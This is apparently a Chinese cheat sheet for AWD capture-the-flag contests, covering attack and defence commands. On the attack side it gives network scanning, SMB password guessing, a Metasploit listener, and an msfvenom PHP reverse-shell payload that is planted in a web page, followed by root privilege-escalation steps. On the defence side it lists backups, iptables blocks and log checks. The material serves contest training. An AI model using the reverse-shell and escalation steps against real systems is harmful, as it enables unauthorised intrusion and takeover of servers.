AWD
扫描对方IP:
ifconfig (先获取自己的IP)
netdiscover -r 192.168.0.1/24 (扫描1~124的IP)
获取IP后:
nmap -sV 192.168.0.104 (端口扫描)
nmap -A -v -T4 192.168.0.104 (TCP 端口扫描)
端口:
22: ssh
21: ftp
23: telnet
80: http
433:https
3306: mysql
若有Samba服务开起:
smbclinet -L 192.168.0.104 (查看目录)
smbclinet '\\192.168.0.104\print$' (进入目录print$)
(一个一个的试)(弱密码猜测)
若进入后:
get a.txt (可以获取a.txt文件)
mysql -h 192.168.0.104 -u Admin -p (连接数据库)
(输入密码) (密码可能藏在某个文件)
searchsploit Samba smbd 3.x - 4.x (搜索)
dirb http://192.168.0.104 (扫描web)
进入网站
登录Admin
使用msf来设置payload
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
show options (查看)
set lhost (ip)
set lport (ip)
run (监听)
msfvenom -p php/meterpreter/reverse_tcp lhost=(ip) lport=(ip) -f raw
(生成php shell 木马)
将木马复制粘贴到某一个php页面,然后想方设法触发漏洞,通过访问该php,即可触发漏洞
触发成功后:
msf里shell
提权:
id (查看当前的用户uid)
python -c "import pty;pty.spawn('/bin/bash')"
cat /etc/passwd (获取用户)
su (用户) (有密码自己找)
sudo -l 提权
sudo su
进入查找flag,一般在 /root/proot.txt
cat proot.txt
提交flag!
ssh操作
ssh <-p 端口> 用户名@IP //登录
scp 文件路径 用户名@IP:存放路径 //向ssh服务器上传输文件
备份web目录
tar -zcvf web.tar.gz /var/www/html/
用户管理
w //查看当前用户
pkill -kill -t <用户tty> //踢掉当前登录用户
进程管理
ps aux | grep pid或者进程名 //查看进程信息
查看已建立的网络连接及进程
netstat -antulp | grep EST
查看指定端口被哪个进程占用
lsof -i:端口号 或者 netstat -tunlp|grep 端口号
结束进程命令
kill PID
killall <进程名>
kill -9 <PID>
iptables命令
封杀某个IP或者ip段,如:123.4.5.6
iptables -I INPUT -s 123.4.5.6 -j DROP
iptables -I INPUT -s 123.4.5.1/24 -j DROP
禁止从某个主机ssh远程访问登陆到本机,如123.4.5.6
iptable -t filter -A INPUT -s 123.4.5.6 -p tcp --dport 22 -j DROP
Mysql数据库操作
备份mysql数据库
mysqldump -u 用户名 -p 密码 数据库名 > back.sql //备份指定数据库
mysqldump --all-databases > bak.sql //备份所有数据库
还原mysql数据库
mysql -u 用户名 -p 密码 数据库名 < bak.sql
安全检查
find / *.php -perm 4777 //查找777的权限的php文件
awk -F: '{if($3==0)print $1}' /etc/passwd //查看root权限的账号
crontab -l //查看计划任务
检测所有的tcp连接数量及状态
netstat -ant|awk '{print $5 "\t" $6}' |grep "[1-9][0-9]*\."|sed -e 's/::ffff://' -e 's/:[0-9]*//'|sort|uniq -c|sort -rn
查看页面访问排名前十的IP
cat /var/log/apache2/access.log | cut -f1 -d " " | sort | uniq -c | sort -k 1 -r | head -10
查看页面访问排名前十的URL
cat /var/log/apache2/access.log | cut -f4 -d " " | sort | uniq -c | sort -k 1 -r | head -10
搜寻网站简要信息
curl --head 网站
xprobe2 -v 网站
nmap []
-A显示详细版本信息
-v显示详细信息
-o显示对方操作系统
matego
Web漏洞发现(http扫描)
webshag
w3af---(强大专业工具)
owasp ZAP等同于w3af WEB扫描工具
注入工具
Sqlmap
setoolkit(*****很牛工具)
AWD的更多相关文章
- CTF线下赛AWD套路小结
近打了2场CTF线下赛,把AWD模式中的一些小套路做一些总结,本人web狗,二进制部分就不班门弄斧了. 一. AWD模式简介 AWD:Attack With Defence,比赛中每个队伍维护多台服务 ...
- 某线下赛AWD
拿别人比赛的来玩一下,或许这就是菜的力量吧. 0x01 任意文件读取: switch ($row['media_type']) { case 0: // 图片广告 ...... break; case ...
- CTF AWD模式攻防Note
###0x01 AWD模式 Attack With Defence,简而言之就是你既是一个hacker,又是一个manager.比赛形式:一般就是一个ssh对应一个web服务,然后flag五分钟一轮, ...
- CTF线下赛AWD模式下的生存技巧
作者:Veneno@Nu1L 稿费:200RMB 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 原文:https://www.anquanke.com/post/id/8467 ...
- 代码审计-四叶草杯线下awd比赛源码web2
今晚简单来看看那天比赛的源码吧,比赛的时候还是有些慌没有好好去静下心看代码. awd给的题中的漏洞,都是那种可以快速让你利用拿到权限后得到flag的那种,特别复杂利用的一般没有. 建议先黑盒去尝试,例 ...
- 关于参加AWD攻防比赛心得体会
今天只是简单写下心得和体会 平时工作很忙 留给学习的时间更加珍少宝贵. 重点说下第二天的攻防比赛吧 . 三波web题 .涉及jsp,php,py. 前期我们打的很猛.第一波jsp的题看到有首页预留后 ...
- AWD攻防工具脚本汇总(一)
最近工作很忙 今天抽空准备下AWD比赛得攻防工具和脚本 以下只是常用 希望下周不被吊锤~~ 后续整理后想抽空写成一个攻击框架汇总放github~~ 这里从各种情景和需求中去总结工具和脚本的使用 情 ...
- Ubunut18 安装docker环境&&AWD攻防平台部署
docker:有两个版本:docker-ce(社区版)和docker-ee(企业版). 参考官网地址:https://docs.docker.com/engine/installation/linux ...
- 线下AWD平台搭建以及一些相关问题解决
线下AWD平台搭建以及一些相关问题解决 一.前言 文章首发于tools,因为发现了一些新问题但是没法改,所以在博客进行补充. 因为很多人可能没有机会参加线下的AWD比赛,导致缺乏这方面经验,比如我参加 ...
- AWD模式搅屎模式
AWD模式搅屎模式 ###0x01 出题思路 ####1:题目类型 1-出题人自己写的cms,为了恶心然后加个so. 2-常见或者不常见的cms. 3-一些框架漏洞,比如ph师傅挖的CI这种 #### ...
随机推荐
- 单页应用 cookies处理
w Node & 单页应用 来做一个完整用户系统吧! - harryfyodor的前端专栏 - SegmentFaulthttps://segmentfault.com/a/119000000 ...
- kafka 配置权限
参考:https://www.cnblogs.com/huxi2b/p/10437844.html http://kafka.apache.org/documentation/#security_au ...
- 博客图片上传picgo工具安装配置github图传使用
摘要 对于每一个写博客的人来说,图片是至关重要.这一路经历了多次图片的烦恼,之前选择了微博个人文章那里粘贴图片的方式上传,感觉也挺方便的.但是由于新浪的图片显示问题,如果header中不设置 标签就不 ...
- EditPlus配色方案
找到配置文件:editplus_u.ini配置文件 [Options] Placement=2C00000002000000030000000083FFFF0083FFFFFFFFFFFFFFFFFF ...
- 【ABAP系列】SAP MB5B中FI凭证摘要是激活的/结果可能不正确 的错误
公众号:SAP Technical 本文作者:matinal 原文出处:http://www.cnblogs.com/SAPmatinal/ 原文链接:[ABAP系列]SAP MB5B中FI凭证摘要是 ...
- 002/CDN-内容分发网络
CDN-内容分发网络 来自于今日头条: https://www.toutiao.com/a6531234862563590663/?tt_from=weixin&utm_campaign=cl ...
- oracle--高级使用(merge)(递归START WITH)分析函数over
1.俩种表复制语句 SELECT INTO和INSERT INTO SELECT两种表复制语句 CT: create table <new table> as select * from ...
- zend studio远程自动上传代码并执行
http://devzc.com/archives/382/zend_studio_sftp_upload_and_exec/ 最近要做服务的接口测试,公司原有的ide测试工具对于数组的参数化很弱.由 ...
- Java数据结构之稀疏数组(Sparse Array)
1.需求 编写的五子棋程序中,有存盘退出和续上盘的功能.因为该二维数组的很多值是默认值0,因此记录了很多没有意义的数据,为了压缩存储所以采用稀疏数组. 2.基本介绍 当一个数组中大部分元素为0,或者为 ...
- P1455 搭配购买 (并查集+01背包)
[题目描述] 明天就是母亲节了,电脑组的小朋友们在忙碌的课业之余挖空心思想着该送什么礼物来表达自己的心意呢?听说在某个网站上有卖云朵的,小朋友们决定一同前往去看看这种神奇的商品,这个店里有n朵云,云朵 ...